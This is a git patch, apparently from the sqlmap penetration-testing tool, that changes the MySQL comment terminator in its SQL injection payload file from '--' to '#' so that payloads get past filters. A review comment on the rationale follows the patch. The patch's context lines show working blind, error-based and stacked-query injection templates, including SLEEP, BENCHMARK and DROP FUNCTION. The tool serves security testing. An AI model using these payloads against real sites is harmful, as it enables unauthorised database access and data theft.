From df4e3be19196f35a5921be9abf95d89564ba69f2 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Wed, 23 Nov 2011 22:57:02 +0000
Subject: [PATCH] using MySQL comments in explicit MySQL payloads where not comments stated in title (as we already use in MySQL UNION payloads; in lots of cases minus character is either filtered or "exploded" - seen in lots of WP vulnerabilites; also, it was a false claim by myself previously that # is no longer a valid MySQL comment syntax in never versions)
---
 xml/payloads.xml | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)
diff --git a/xml/payloads.xml b/xml/payloads.xml
index 289c59003..3db241a5f 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -1039,7 +1039,7 @@ Formats:
 ; IF(([INFERENCE]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]);
 ; IF(([RANDNUM]=[RANDNUM]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]);
- --
+ #
 ; IF(([RANDNUM]=[RANDNUM1]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]);
@@ -1402,7 +1402,7 @@ Formats:
 OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)
 OR 1 GROUP BY CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)
- --
+ #
 [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
@@ -1834,7 +1834,7 @@ Formats:
 ; IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]);
 ; SELECT SLEEP([SLEEPTIME]);
- --
+ #
@@ -1855,7 +1855,7 @@ Formats:
 ; IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]);
 ; SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'));
- --
+ #
@@ -2106,7 +2106,7 @@ Formats:
 AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
 AND SLEEP([SLEEPTIME])
- --
+ #
@@ -2146,7 +2146,7 @@ Formats:
 AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])
 AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))
- --
+ #
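Review bot: The six hunks (at file lines 1039, 1402, 1834, 1855, 2106 and 2146) all swap the MySQL comment terminator `--` for `#` in what appears to be the `<comment>` element, but nothing in the file records why, so the rationale lives only in this commit message and the next maintainer may well revert it for consistency. One syntactic reason is worth stating in the file: MySQL recognises `--` as a comment only when whitespace follows it, whereas `#` needs no trailing character, so if the XML reader trims trailing whitespace (I cannot confirm that from this hunk) the old value would have stopped being a comment at all. I would add a single XML comment above the first changed element rather than repeating it six times, along the lines of `<!-- MySQL line comment: "#" needs no trailing whitespace, unlike "-- "; the UNION payloads use the same form -->`. Each payload entry that contains the changed `<comment>` starts and ends outside the hunk, so the exact placement should be checked against the full entries.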